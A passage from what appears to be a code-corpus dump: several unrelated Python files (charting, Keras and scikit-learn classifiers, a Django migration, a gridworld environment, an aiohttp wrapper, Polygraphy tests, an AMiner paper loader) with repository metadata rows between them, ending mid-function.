df_penthouse = df_district.loc[df_district['apartment_type'] == 'PENTHOUSE']
if len(df_penthouse.index) != 0: mean_price_penthouse = int(round(df_penthouse["price"].mean(), 0))
bar_chart = pygal.Bar(legend_at_bottom=True)
bar_chart.title = 'Prediction value and district average price per apartment type (in €)'
bar_chart.add('Your Prediction', [prediction_price])
bar_chart.add('Studio', [mean_price_studio])
bar_chart.add('One Room', [mean_price_one_room])
bar_chart.add('Two Room', [mean_price_two_room])
bar_chart.add('Three Room', [mean_price_three_room])
bar_chart.add('Four Room', [mean_price_four_room])
bar_chart.add('Five Plus Room', [mean_price_five_room])
bar_chart.add('Penthouse', [mean_price_penthouse])
file_name = f"prediction_bar{str(uuid.uuid4())}.svg"
file_location = f"web_app/static/web_app/media/{file_name}"
bar_chart.render_to_file(file_location)
return file_name
def get_svg_pie_chart_by_number_properties_for_sale(df_district):
mapping_type = {'1-STAEN': '1 ROOM', '2-STAEN': '2 ROOM', '3-STAEN': '3 ROOM', '4-STAEN': '4 ROOM',
'MNOGOSTAEN': '5+ ROOMS', 'MEZONET': 'PENTHOUSE', 'ATELIE': 'STUDIO'}
df_district['apartment_type'].replace(mapping_type, inplace=True)
count_studio = 0
df_studio = df_district.loc[df_district['apartment_type'] == 'STUDIO']
if len(df_studio.index) != 0: count_studio = df_studio["price"].count()
count_one_room = 0
df_one_room = df_district.loc[df_district['apartment_type'] == '1 ROOM']
if len(df_one_room.index) != 0: count_one_room = df_one_room["price"].count()
count_two_room = 0
df_two_room = df_district.loc[df_district['apartment_type'] == '2 ROOM']
if len(df_two_room.index) != 0: count_two_room = df_two_room["price"].count()
count_three_room = 0
df_three_room = df_district.loc[df_district['apartment_type'] == '3 ROOM']
if len(df_three_room.index) != 0: count_three_room = df_three_room["price"].count()
count_four_room = 0
df_four_room = df_district.loc[df_district['apartment_type'] == '4 ROOM']
if len(df_four_room.index) != 0: count_four_room = df_four_room["price"].count()
count_five_room = 0
df_five_plus_room = df_district.loc[df_district['apartment_type'] == '5+ ROOMS']
if len(df_five_plus_room.index) != 0: count_five_room = df_five_plus_room["price"].count()
count_penthouse = 0
df_penthouse = df_district.loc[df_district['apartment_type'] == 'PENTHOUSE']
if len(df_penthouse.index) != 0: count_penthouse = df_penthouse["price"].count()
pie_chart = pygal.Pie(inner_radius=.4, show_legend=False)
pie_chart.title = 'Number properties for sale per apartment type for your prediction district'
pie_chart.add('Prediction placeholder', [0])
pie_chart.add('Studio', [count_studio])
pie_chart.add('One Room', [count_one_room])
pie_chart.add('Two Room', [count_two_room])
pie_chart.add('Three Room', [count_three_room])
pie_chart.add('Four Room', [count_four_room])
pie_chart.add('Five Plus Room', [count_five_room])
pie_chart.add('Penthouse', [count_penthouse])
file_name = f"prediction_pie{str(uuid.uuid4())}.svg"
file_location = f"web_app/static/web_app/media/{file_name}"
pie_chart.render_to_file(file_location)
return file_name
| [
"a.jirov@student.fontys.nl"
] | a.jirov@student.fontys.nl |
a23916c417b2fe893c1d68ba20334ad5fc4aee29 | 15b4acc80b261325fdfc95f55852e8bf2bdbbb58 | /Keras_tf.py | 1ca06439b516cfcbd3c51dcb558640c67c4a0982 | [] | no_license | ChristianMDahl/ClassificationGradesheetsMiniPics | 8b551904fdac734a144ac3339ea7b410266ace6b | 1fd03c1b80ccb996723382ae657081e368cd8b34 | refs/heads/master | 2021-07-09T16:58:55.267843 | 2017-10-07T15:34:35 | 2017-10-07T15:34:35 | 106,108,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,303 | py | #---------------------------------------------------------
# Classification of mini_pics from sweedish grading sheets
#---------------------------------------------------------
import tensorflow as tf
#Re_estimate = 1: New model is trained
#Re_estimate = 0: Most recently trianed model is loaded
##################
Re_estimate = 0 ##
##################
data_train = tf.contrib.keras.preprocessing.image.DirectoryIterator(directory='Z:\\faellesmappe\\cmd\\MartinKarlsson\\tiny_pics\\goodsmall\\gradessmall\\train',
image_data_generator=tf.contrib.keras.preprocessing.image.ImageDataGenerator(rescale=1./255),
color_mode = 'grayscale',
class_mode ='categorical',
target_size=(28, 28))
# To make this work efficient we need a directory - similar to gradesmall - where we have the data for validation/test
data_test = tf.contrib.keras.preprocessing.image.DirectoryIterator(directory='Z:\\faellesmappe\\cmd\\MartinKarlsson\\tiny_pics\\goodsmall\\gradessmall\\test',
image_data_generator=tf.contrib.keras.preprocessing.image.ImageDataGenerator(rescale=1./255),
color_mode = 'grayscale',
class_mode ='categorical',
target_size=(28, 28))
if Re_estimate == 1:
model = tf.contrib.keras.models.Sequential()
model.add(tf.contrib.keras.layers.Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=data_train.image_shape))
model.add(tf.contrib.keras.layers.Conv2D(64, (3, 3), activation='relu'))
model.add(tf.contrib.keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(tf.contrib.keras.layers.Dropout(0.25))
model.add(tf.contrib.keras.layers.Flatten())
model.add(tf.contrib.keras.layers.Dense(128, activation='relu'))
model.add(tf.contrib.keras.layers.Dropout(0.5))
model.add(tf.contrib.keras.layers.Dense(data_train.num_class, activation='softmax'))
model.compile(loss=tf.contrib.keras.losses.categorical_crossentropy,
optimizer=tf.contrib.keras.optimizers.Adadelta(),
metrics=['accuracy'])
# with tf.device('/gpu:1'): #Unfortunately this does not work...probably need to install tensorflow with the GPU open
model.fit_generator(data_train,steps_per_epoch=200,epochs=100,validation_data=data_test,validation_steps= data_test.batch_size)
score = model.evaluate_generator(data_train,steps=data_train.batch_size)
print('Train loss:', score[0])
print('Train accuracy:', score[1])
score = model.evaluate_generator(data_test,steps=data_test.batch_size)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# serialize model to YAML
model_yaml = model.to_yaml()
with open("model.yaml", "w") as yaml_file:
yaml_file.write(model_yaml)
#serialize weights to HDF5
model.save_weights("model.h5")
print("Saved model to disk")
if Re_estimate == 0:
# load YAML and create model
yaml_file = open('model.yaml', 'r')
loaded_model_yaml = yaml_file.read()
yaml_file.close()
loaded_model = tf.contrib.keras.models.model_from_yaml(loaded_model_yaml)
# load weights into new model
loaded_model.load_weights("model.h5")
print("Loaded model from disk")
# evaluate loaded model on test data
loaded_model.compile(loss=tf.contrib.keras.losses.categorical_crossentropy,
optimizer=tf.contrib.keras.optimizers.Adadelta(),
metrics=['accuracy'])
score = loaded_model.evaluate_generator(data_test,steps=data_test.batch_size)
print("%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100))
| [
"christianmdahl@gmail.com"
] | christianmdahl@gmail.com |
ccecdaff747cdec374326dda1a311cbd51a5223a | 9e4e40eafb302a560ce33f2c8418769fa14185d1 | /section3/sentiment_analysis.py | 0ebb649d7cd782b635beafc7bfaa8e394e758d86 | [] | no_license | anantsrivastava30/TextMining | 371bd46663e39702a0e38f8a6598e3e3030aca35 | f13f001295ee2567a6b2e4c277774fdac6426a44 | refs/heads/master | 2021-05-06T03:10:50.061765 | 2018-02-09T07:40:02 | 2018-02-09T07:40:02 | 114,817,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,214 | py | # coding: utf-8
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.svm import SVC
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
import re
df = pd.read_csv("Amazon_Unlocked_Mobile.csv")
df = df.sample(frac=0.01, random_state=10)
df.dropna(inplace=True)
df = df[df['Rating'] != 3]
df['Positively Rated'] = np.where(df['Rating'] > 3, 1, 0)
print(df['Positively Rated'].mean())
X_train, X_test, y_train, y_test = train_test_split(
df['Reviews'], df['Positively Rated'], random_state=0)
print('X_train first entry:\n\n', X_train.iloc[0])
print('\n\nX_train shape: ', X_train.shape)
# Fit the CountVectorizer to the training data
vect = CountVectorizer().fit(X_train)
print(vect.get_feature_names()[::2000])
print(len(vect.get_feature_names()))
X_train_vectorized = vect.transform(X_train)
print(X_train_vectorized.toarray().shape)
model = LogisticRegression()
model.fit(X_train_vectorized, y_train)
# Predict the transformed test documents
predictions = model.predict(vect.transform(X_test))
print('AUC: ', roc_auc_score(y_test, predictions))
spam_data = pd.read_csv('spam.csv')
spam_data['target'] = np.where(spam_data['target'] == 'spam', 1, 0)
spam_data.head(10)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(
spam_data['text'], spam_data['target'], random_state=0)
def answer_one():
print(spam_data.shape)
return "{:2.3f}%".format(spam_data['target'].values.mean() * 100)
from sklearn.feature_extraction.text import CountVectorizer
def answer_two():
vect = CountVectorizer().fit(X_train)
return sorted(vect.get_feature_names(), key=len)[-1]
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import roc_auc_score
def answer_three():
vect = CountVectorizer().fit(X_train)
x_trained_vector = vect.transform(X_train)
print(x_trained_vector.shape)
model = MultinomialNB()
model.fit(x_trained_vector, y_train)
predictions = model.predict(vect.transform(X_train))
return roc_auc_score(y_train, predictions)
def answer_four():
vect = TfidfVectorizer().fit(X_train)
s1 = pd.Series(vect.idf_, vect.get_feature_names())
s2 = pd.Series(vect.idf_, vect.get_feature_names())
s1.sort_values(inplace=True, ascending=True)
s2.sort_values(inplace=True, ascending=False)
return (s1[:20], s2[:20])
def answer_five():
vect = TfidfVectorizer(min_df=3).fit(X_train)
X_train_vectorized = vect.transform(X_train)
print(X_train_vectorized.shape)
model = MultinomialNB()
model.fit(X_train_vectorized, y_train)
predictions = model.predict(vect.transform(X_test))
return roc_auc_score(y_test, predictions)
def answer_six():
sp = spam_data[spam_data['target'] == 1]
_ns = sp['text'].apply(lambda x: len(x)).mean()
sp = spam_data[spam_data['target'] == 0]
_s = sp['text'].apply(lambda x: len(x)).mean()
return (_ns, _s)
def add_feature(X, feature_to_add):
"""
Returns sparse feature matrix with added feature.
feature_to_add can also be a list of features.
"""
from scipy.sparse import csr_matrix, hstack
return hstack([X, csr_matrix(feature_to_add).T], 'csr')
def answer_seven():
vect = TfidfVectorizer(min_df=5).fit(X_train)
X_train_vectorized = vect.transform(X_train)
print(X_train_vectorized.shape)
sd = spam_data['text'].apply(lambda x: len(x))
X_train_vectorized_new = add_feature(
X_train_vectorized, sd[X_train.index])
model = SVC(C=10000)
model.fit(X_train_vectorized_new, y_train)
X_test_new = add_feature(vect.transform(X_test), sd[X_test.index])
predictions = model.predict(X_test_new)
return roc_auc_score(y_test, predictions)
def answer_eight():
spam = spam_data[spam_data['target'] == 1]
n_spam = spam_data[spam_data['target'] == 0]
digit = spam['text'].apply(lambda s: sum(
[c.isdigit() for c in s])).mean()
n_digit = n_spam['text'].apply(
lambda s: sum([c.isdigit() for c in s])).mean()
return (digit, n_digit)
def answer_nine():
vect = TfidfVectorizer(min_df=5, ngram_range=(1, 3)).fit(X_train)
X_train_vectorized = vect.transform(X_train)
print(X_train_vectorized.shape)
sd = spam_data['text'].apply(lambda x: len(x))
dc = spam_data['text'].apply(
lambda s: sum([c.isdigit() for c in s]))
X_train_vectorized_new = add_feature(
X_train_vectorized, sd[X_train.index])
X_train_vectorized_new = add_feature(
X_train_vectorized, dc[X_train.index])
model = LogisticRegression(
C=100).fit(
X_train_vectorized_new, y_train)
X_test_new = add_feature(vect.transform(X_test), sd[X_test.index])
X_test_new = add_feature(vect.transform(X_test), dc[X_test.index])
prediction = model.predict(X_test_new)
return roc_auc_score(y_test, prediction)
def answer_ten():
ss = spam_data['text'].apply(
lambda s: sum([bool(re.match('\W', x)) for x in s]))
spam = ss[spam_data['target'] == 1].mean()
n_spam = ss[spam_data['target'] == 0].mean()
return (spam, n_spam)
def test_sample(v, model):
se = pd.Series(["A lot has happened on Facebook since , XIME offers a 2 year, full-time, residential PGDM programme through its centers last logged in. Here are some notifications you've missed from your friends",
"As you might be aware, XIME offers a 2 year, full-time, residential PGDM programme through its centers in Bangalore, Chennai and Kochi. Our PGDM programme is ranked 22nd by Business India (All India - 2017) and 25th by Business Standard (All India - 2017)."])
ld = se.apply(lambda s: len(s))
nd = se.apply(lambda s: sum([c.isdigit() for c in s]))
nw = se.apply(lambda s: sum([bool(re.match('\W', x)) for x in s]))
X = add_feature(v.transform(se), [ld, nd, nw])
print("sample case predictions :{}".format(model.predict(X)))
def answer_eleven():
vect = CountVectorizer(
min_df=5, ngram_range=(2, 5), analyzer='char_wb').fit(X_train)
ld = spam_data['text'].apply(lambda s: len(s))
nd = spam_data['text'].apply(
lambda s: sum([c.isdigit() for c in s]))
nw = spam_data['text'].apply(
lambda s: sum([bool(re.match('\W', x)) for x in s]))
X_train_vectorized = add_feature(
vect.transform(X_train),
[ld[X_train.index], nd[X_train.index], nw[X_train.index]])
model = LogisticRegression(C=100).fit(X_train_vectorized, y_train)
X_test_vectorized = add_feature(
vect.transform(X_test),
[ld[X_test.index], nd[X_test.index], nw[X_test.index]])
predection = model.predict(X_test_vectorized)
features = np.array(vect.get_feature_names())
coff = model.coef_[0].argsort()
large_coff = features[coff[:10]]
small_coeff = features[coff[len(coff) - 11:len(coff) - 1]]
roc = roc_auc_score(y_test, predection)
return (roc, list(small_coeff), list(large_coff))
| [
"anantsrivastava30@gmail.com"
] | anantsrivastava30@gmail.com |
b6c14ecc4de8df6c97043617c7c8596c81f72f7a | 36f0cb1f6d660ab3f6de972c2c43b79276399581 | /prgrm1.py | 9c26052c51df30bd4ab8ae5b41b9d00e0eece9b9 | [] | no_license | alugurikeerthana/task1 | ea16a813f7015d55b17f154f049b129c72afe87d | fe3c4a112c6832c2ffc1ac4c1b7e5566d97bceec | refs/heads/master | 2020-03-19T13:13:39.361996 | 2018-06-08T05:05:39 | 2018-06-08T05:05:39 | 136,568,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | import numpy as np
x = np.random.randint(low=10, high=30, size=6)
print(x)
| [
"noreply@github.com"
] | noreply@github.com |
92f23dfc35fd5f746d7c4a087a4c054ae511a765 | 637d06abc4c533cabfed9518857c702b6d0558a6 | /users/migrations/0001_initial.py | fbaefc5cbc447a45eaa28c11f2b2df3d9d6bbbaf | [] | no_license | nakusha/airbnb_django_backend | 5756b2e02abb3304ca67ee387041a83813890119 | 2a60c9279d5a661be264e5568451d544a29962ca | refs/heads/master | 2023-06-20T02:08:16.540289 | 2021-07-18T15:26:37 | 2021-07-18T15:26:37 | 367,626,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,519 | py | # Generated by Django 3.2.3 on 2021-06-16 07:25
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('avatar', models.ImageField(blank=True, upload_to='')),
('gender', models.CharField(blank=True, choices=[('male', 'Male'), ('female', 'Female'), ('other', 'Other')], max_length=10)),
('bio', models.TextField(blank=True)),
('birthDay', models.DateField(blank=True, null=True)),
('language', models.CharField(blank=True, choices=[('en', 'English'), ('kr', 'Korean')], max_length=2)),
('currency', models.CharField(blank=True, choices=[('usd', 'USD'), ('krw', 'KRW')], max_length=3)),
('superhost', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"“runnaway@naver.com”"
] | “runnaway@naver.com” |
8f621fcf4d57992e0318f3582902bd71e2732e6d | fcbacd428f9cbf0e384534fea1ebc068efa7285a | /data.py | 6700e4831b1b5bdc34e692d0fc5da333e279a696 | [] | no_license | punkungkub/RoobotEvolution | f064b5fa58e0a2920ccc9b349521ed0a1a29a86c | 8f4d1a40a3921b493cf963653eba07a5ed537b70 | refs/heads/master | 2022-11-27T01:44:50.513264 | 2020-08-04T06:48:11 | 2020-08-04T06:48:11 | 284,873,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | import matplotlib.pyplot as plt
import numpy as np
import pickle, json
import os,shutil
from threading import Thread
class data:
def __init__(self):
self.generation=[]
self.fitness={}
self.data={}
def storage(self, gen, data):
self.generation.append(gen)
self.data.update({gen:data})
fitness,data=[],[]
for person in data:
fitness.append(data[person]['fitness'])
self.fitness[gen]=fitness
def plot(self):
plt.figure()
for x in self.fitness:
for y in self.fitness[x]:
plt.scatter(x, y,c='k')
plt.xlabel('Generation')
plt.ylabel('Fitness')
plt.savefig('dot_plot.jpeg')
def saveData(self):
with open('data.txt', 'w') as outfile:
json.dump(self.fitness, outfile, indent=4)
def saveProperty(self):
with open('current_robot.txt', 'w') as outfile:
json.dump(self.data, outfile, indent=4)
def moveData(self):
print("Backing up data ...")
path=os.path.join(os.getcwd(),'dataStorage')
if not os.path.exists(path):
os.mkdir(path)
else:
return
shutil.move(os.path.join(os.getcwd(),'dot_plot.jpeg'),os.path.join(path,'dot_plot.jpeg'))
shutil.move(os.path.join(os.getcwd(),'data.txt'),os.path.join(path,'data.txt'))
shutil.move(os.path.join(os.getcwd(),'current_robot.txt'),os.path.join(path,'current_robot.txt'))
print("Completed!")
| [
"43475513+punkungkub@users.noreply.github.com"
] | 43475513+punkungkub@users.noreply.github.com |
f934db4460afcfe6a86fce63da946622c0bed8ad | 981ac0fc0958ed4258e8adb4408980857d8d0cc1 | /monitor/web_session.py | a4258028fbf0b035aafff6aada8783b9b6f5cd4e | [] | no_license | D3ee/YjMonitor | 1dc8e19d464784610cc9db9450d069b3bad5fe65 | 8179f9d39aa5b60274da4b7e38e173e380265c42 | refs/heads/master | 2020-05-27T23:52:57.340370 | 2019-05-27T10:28:57 | 2019-05-27T10:28:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,156 | py | import sys
import asyncio
import aiohttp
import printer
from exceptions import LogoutError, RspError
from json_rsp_ctrl import Ctrl, JsonRspType, DEFAULT_CTRL, TMP_DEFAULT_CTRL
sem = asyncio.Semaphore(2)
class WebSession:
def __init__(self):
self.var_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=4))
@staticmethod
async def __get_json_body(rsp):
json_body = await rsp.json(content_type=None)
return json_body
@staticmethod
async def __get_text_body(rsp):
text = await rsp.text()
return text
@staticmethod
async def __get_binary_body(rsp):
return await rsp.read()
# method 类似于aiohttp里面的对应method,目前只支持GET、POST
# is_login后期移除,json这里应该与expected_code协同
async def request_json(self,
method,
url,
is_login=False,
ctrl: Ctrl = TMP_DEFAULT_CTRL,
**kwargs) -> dict:
async with sem:
i = 0
while True:
i += 1
if i >= 10:
printer.warn(url)
try:
async with self.var_session.request(method, url, **kwargs) as rsp:
if rsp.status == 200:
json_body = await self.__get_json_body(rsp)
if json_body: # 有时候是None或空,直接屏蔽。下面的read/text类似,禁止返回空的东西
json_rsp_type = ctrl.verify(json_body)
if json_rsp_type == JsonRspType.OK:
return json_body
elif json_rsp_type == JsonRspType.IGNORE:
await asyncio.sleep(1.0)
elif json_rsp_type == JsonRspType.LOGOUT:
print('api提示没有登录')
print(json_body)
if not is_login:
raise LogoutError(msg='提示没有登陆')
else:
return json_body
elif rsp.status == 403:
printer.warn(f'403频繁, {url}')
await asyncio.sleep(240)
except RspError:
raise
except asyncio.CancelledError:
raise
except:
# print('当前网络不好,正在重试,请反馈开发者!!!!')
print(sys.exc_info()[0], sys.exc_info()[1], url)
await asyncio.sleep(0.02)
async def request_binary(self,
method,
url,
**kwargs) -> bytes:
async with sem:
i = 0
while True:
i += 1
if i >= 10:
printer.warn(url)
try:
async with self.var_session.request(method, url, **kwargs) as rsp:
if rsp.status == 200:
binary_body = await self.__get_binary_body(rsp)
if binary_body:
return binary_body
elif rsp.status == 403:
printer.warn(f'403频繁, {url}')
await asyncio.sleep(240)
except asyncio.CancelledError:
raise
except:
# print('当前网络不好,正在重试,请反馈开发者!!!!')
print(sys.exc_info()[0], sys.exc_info()[1], url)
await asyncio.sleep(0.02)
async def request_text(self,
method,
url,
**kwargs) -> str:
async with sem:
i = 0
while True:
i += 1
if i >= 10:
printer.warn(url)
try:
async with self.var_session.request(method, url, **kwargs) as rsp:
if rsp.status == 200:
text_body = await self.__get_text_body(rsp)
if text_body:
return text_body
elif rsp.status == 403:
printer.warn(f'403频繁, {url}')
await asyncio.sleep(240)
except asyncio.CancelledError:
raise
except:
# print('当前网络不好,正在重试,请反馈开发者!!!!')
print(sys.exc_info()[0], sys.exc_info()[1], url)
await asyncio.sleep(0.02)
| [
"yjqiang1@gmail.com"
] | yjqiang1@gmail.com |
fe1157f372e8999831140b5c8835adac1ce983b2 | bc572eca7a03aec83ee55300887a21cad3dbd160 | /tools/Polygraphy/tests/comparator/test_postprocess.py | 0cbba453125e5baa918d358612e41d35c9cb243d | [
"Apache-2.0",
"BSD-3-Clause",
"ISC",
"BSD-2-Clause",
"MIT"
] | permissive | wuqiangch/TensorRT | fba0029dc5c0b3b9ffa091e45f26d8d10d702393 | d04182cd0086c70db4a8ad30e0d7675c4eb33782 | refs/heads/master | 2023-05-31T21:04:01.079351 | 2021-06-23T20:37:20 | 2021-06-25T19:39:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,520 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from polygraphy.comparator import PostprocessFunc, IterationResult
class TestTopK(object):
def test_basic(self):
arr = np.array([1, 2, 3, 4, 5], dtype=np.float32)
func = PostprocessFunc.topk_func(k=3)
top_k = func(IterationResult({"x": arr}))
assert np.all(top_k["x"] == [4, 3, 2])
def test_k_can_exceed_array_len(self):
arr = np.array([1, 2, 3, 4, 5], dtype=np.float32)
func = PostprocessFunc.topk_func(k=10)
top_k = func(IterationResult({"x": arr}))
assert np.all(top_k["x"] == [4, 3, 2, 1, 0])
def test_per_output_top_k(self):
arr = np.array([1, 2, 3, 4, 5], dtype=np.float32)
func = PostprocessFunc.topk_func(k={"": 10, "y": 2})
top_k = func(IterationResult({"x": arr, "y": arr}))
assert np.all(top_k["x"] == [4, 3, 2, 1, 0])
assert np.all(top_k["y"] == [4, 3])
| [
"rajeevsrao@users.noreply.github.com"
] | rajeevsrao@users.noreply.github.com |
96659a31eb97f9771b0d4e5698d71ee2d18d1006 | b715012e5ba8c54ff6676aa4c7c7f3c7ed7ee32a | /gridworld.py | bf3fb97f8fcfb3f37474453ca2321ab8d1b56b8a | [] | no_license | chengshaozhe/sheep_policy | 569adf80e129ed070e0866e6f53d1b61ddfcd76d | fcbfaaa2506e228036fe8606ca271555fc3f291a | refs/heads/master | 2021-08-08T07:23:59.063663 | 2020-04-19T12:35:37 | 2020-04-19T12:35:37 | 158,331,454 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,104 | py |
import numpy as np
from viz import *
from reward import *
import random
from collections import deque
import os
from PIL import Image
class GridWorld():
def __init__(self, name='', nx=None, ny=None):
self.name = name
self.nx = nx
self.ny = ny
self.coordinates = tuple(it.product(range(self.nx), range(self.ny)))
self.terminals = []
self.obstacles = []
self.features = co.OrderedDict()
def add_terminals(self, terminals=[]):
for t in terminals:
self.terminals.append(t)
def add_obstacles(self, obstacles=[]):
for o in obstacles:
self.obstacles.append(o)
def add_feature_map(self, name, state_values, default=0):
self.features[name] = {s: default for s in self.coordinates}
self.features[name].update(state_values)
def is_state_valid(self, state):
if state[0] not in range(self.nx):
return False
if state[1] not in range(self.ny):
return False
if state in self.obstacles:
return False
return True
def reward(self, s, a, s_n, W={}):
if not W:
return sum(map(lambda f: self.features[f][s_n], self.features))
return sum(map(lambda f: self.features[f][s_n] * W[f], W.keys()))
def draw_feature(self, ax, name, **kwargs):
I = dict_to_array(self.features[name])
return draw_2D_array(I, ax, **kwargs)
def draw_features_first_time(self, ax, features=[], colors={},
masked_values={}, default_masked=0):
assert set(features).issubset(set(self.features.keys()))
if not features:
features = self.features.keys()
if len(features) > len(color_set):
raise ValueError("there are %d features and only %d colors"
% (len(features), len(color_set)))
free_color = list(filter(lambda c: c not in colors.values(),
color_set))
colors.update({f: free_color.pop(0)
for f in features if f not in colors.keys()})
masked_values.update({f: default_masked
for f in features if f not in masked_values.keys()})
assert set(masked_values.keys()) == set(colors.keys()) == set(features)
if not ax:
fig, ax = plt.subplots(1, 1, tight_layout=True)
def single_feature(ax, name):
f_color = colors[name]
masked_value = masked_values[name]
return self.draw_feature(ax, name, f_color=f_color,
masked_value=masked_value)
ax_images = {f: single_feature(ax, f) for f in features}
return ax, ax_images
def update_features_images(self, ax_images, features=[], masked_values={},
default_masked=0):
def update_single_feature(name):
try:
masked_value = masked_values[name]
except:
masked_value = default_masked
I = dict_to_array(self.features[name])
return update_axes_image(ax_images[name], I, masked_value)
return {f: update_single_feature(f) for f in features}
def draw(self, ax=None, ax_images={}, features=[], colors={},
masked_values={}, default_masked=0, show=False, save_to=''):
plt.cla()
if ax:
ax.get_figure()
new_features = [f for f in features if f not in ax_images.keys()]
old_features = [f for f in features if f in ax_images.keys()]
ax, new_ax_images = self.draw_features_first_time(ax, new_features,
colors, masked_values, default_masked=0)
old_ax_images = self.update_features_images(ax_images, old_features,
masked_values,
default_masked=0)
ax_images.update(old_ax_images)
ax_images.update(new_ax_images)
# if save_to:
# fig_name = os.path.join(save_to, str(self.name) + ".png")
# plt.savefig(fig_name, dpi=200)
# if self.verbose > 0:
# print ("saved %s" % fig_name)
# if show:
# plt.show()
return ax, ax_images
# def reward(s, a, env=None, const=-10, is_terminal=None):
# return const + sum(map(lambda f: env.features[f][s], env.features))
def grid_reward(s, a, sn, env=None, const=-1):
goal_reward = env.features['sheep'][sn] if sn in env.terminals else const
obstacle_punish = env.features['obstacle'][sn] if sn in env.obstacles else 0
return goal_reward + obstacle_punish
def physics(s, a, env=None):
if s in env.terminals:
return s
s_n = tuple(map(sum, zip(s, a)))
if env.is_state_valid(s_n):
return s_n
return s
def getValidActions(s, A, env=None):
valid_actions = []
for a in A:
s_n = tuple(map(sum, zip(s, a)))
if env.is_state_valid(s_n):
valid_actions.append[a]
return valid_actions
def state_to_image_array(env, image_size, wolf_states, sheeps, obstacles):
wolf = {s: 1 for s in wolf_states}
env.add_feature_map("wolf", wolf, default=0)
env.add_feature_map("sheep", sheeps, default=0)
env.add_feature_map("obstacle", obstacles, default=0)
ax, _ = env.draw(features=("wolf", "sheep", "obstacle"), colors={
'wolf': 'r', 'sheep': 'g', 'obstacle': 'y'})
fig = ax.get_figure()
# fig.set_size_inches((image_size[0] / fig.dpi, image_size[1] / fig.dpi)) # direct resize
fig.canvas.draw()
image = np.fromstring(fig.canvas.tostring_rgb(),
dtype=np.uint8, sep='')
image_array = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# use PIL to resize
pil_im = Image.fromarray(image_array)
image_array = np.array(pil_im.resize(image_size[:2], 3))
# print (image_array.shape)
# print (len(np.unique(image_array)))
return image_array
| [
"chengshaozhe@gmail.com"
] | chengshaozhe@gmail.com |
ebc1183cbaf4a2933e809513c7b5f6acf4717951 | f9efe2ce2325ad3d5d3c5762f3c85e51a2612ea8 | /expert_finding/data/io_aminer.py | 26118e99e5876e001ee1f12a857a1ff36bc01e49 | [] | no_license | elvesmrodrigues/Kcore_Expert_Finding | 3e3347fa77b51d81999fcac12ac9a7324568763e | c03174640f62771492805fb6cbb08f3d2ba6f88f | refs/heads/main | 2023-06-25T03:42:15.155785 | 2021-07-26T12:57:22 | 2021-07-26T12:57:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,136 | py | import itertools
import os
import pkg_resources
import json
def load_papers(infname):
papers = list()
with open(infname, 'r', encoding='UTF-8') as f:
for key, group in itertools.groupby(f, key=lambda l: l.strip(' \n\r') == ''):
if not key:
refs = []
authors = []
title, venue, year, idx, abstract = [''] * 5
for item in group:
item = item.strip(' \r\n')
if item.startswith('#*'):
title = item[2:].strip()
elif item.startswith('#@'):
authors = item[2:].split(',')
authors = [a.strip() for a in authors]
elif item.startswith('#t'):
year = item[2:].strip()
